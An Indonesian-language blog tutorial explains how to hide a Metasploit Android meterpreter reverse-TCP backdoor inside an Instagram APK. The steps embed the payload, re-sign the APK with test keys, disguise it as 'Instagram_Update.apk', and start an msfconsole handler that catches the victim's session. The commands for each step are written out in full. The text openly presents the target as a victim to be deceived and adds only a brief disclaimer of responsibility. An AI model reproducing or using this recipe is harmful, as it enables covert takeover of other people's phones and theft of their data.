Cara Menyisipkan file Backdoor kedalam Apk

Assalamualaikum wr.wb
Hallo sobat setia Master Linuxser Kali ini admin mao share lagi Cara Cara Menyisipkan file Backdoor kedalam apk

Kalau untuk mengelabui target user windows dengan membuat backdoor dengan format file tertentu mungkin sudah biasa ya, karena memang sudah banyak module exploit yang digunakan untuk membuat backdoor dengan format file tertentu(.pdf, .doc, .rar). lalu bagaimana jika target exploit kita android, dan bagaimana untuk menyamarkan backdoor tersebut? Oke di bawah ini akan saya berikan contoh cara menyisipkan backdoor kedalam file apk.

Extract file tersebut lalu masukkan file apk yang akan di sisipi backdoor ke dalam folder apk-embed jadi satu dengan apk-embed-payload.rb. sebagai contoh disini saya akan menyisipkan backdoor kedalam file apk Instagram

Nah untuk memasukkan payload ke dalam file apk tersebut perintahnya seperti ini
  • cd Desktop/apk-embed
  • ls
Isi file dari direktori aktif bernama apk-embed-payload.rb Instagram.apk

Lihat pada gambar di bawah ini :


Untuk Melihat ip di PC kita ketik kan
  • ifconfig
Liat gambar di bawah ini :


Lalu kita ketikan lagi

  • ruby apk-embed-payload.rb Instagram.apk -p android/meterpreter/reverse_tcp lhost=Isi dengan alamat IP anda lport=1337


Lalu Tunggu hingga prossesnya selesai,


Jika berhasil nantinya akan ada file baru yang telah disisipi backdoor dengan nama namafile_backdoored.apk


Selanjutnya adalah melakukan SignApk, tujuannya agar file apk yang telah di sisipi backdoor tersebut bisa di install di semua device android.

Caranya, masukkan file apk hasil backdooring kedalam folder SignApk. lalu lakukan sign dengan perintah dibawah ini

  • java -jar signapk.jar testkey.x509.pem testkey.pk8 [file_asli.apk] [file_asli_hasilsign.apk]

Contoh

  • java -jar signapk.jar testkey.x509.pem testkey.pk8 Instagram_backdoored.apk Instagram_Update.apk


Nah diatas file hasil sign saya beri nama Instagram_Update.apk dan file siap di kirim ke target. namun sebelumnya buka msfconsole, set seperti di bawah ini :

  1. msfconsole
  2. use exploit/multi/handler
  3. set payload android/meterpreter/reverse_tcp
  4. set lhost 192.168.1.100 
  5. set lport 1337
  6. exploit
lhost dan lport sesuaikan dengan yang kalian gunakan. 

Lihat pada gambar di bawah ini :


Lalu tinggal download saja lewat hp korban lewat localhost dan port yang berjalan di browser lihat gambar :


Berikut ini adalah tampilan android target ketika menginstall file apk yang di sisipi backdoor tadi. 


Namun begitu target mebuka aplikasi tersebut kita juga mendapatkan sesi meterpreter nya lihat gambar dibawah ini :


Lalu korbanpun siap di eksekusi ketikan pada command :

  • sysinfo


Berhasil bukan haha, pelajaran ini hanya untuk pengetahuan saja tidak boleh di salah gunakan saya tidak akan bertanggung jawab semisal nya di salah gunakan.

Bagi yang mau mencoba bisa download bahannya dibawah ini :


Oke sekian dari saya semoga dapat bermanfaat buat kalian semua jangan lupa di share ya Thanks

Subscribe to receive free email updates: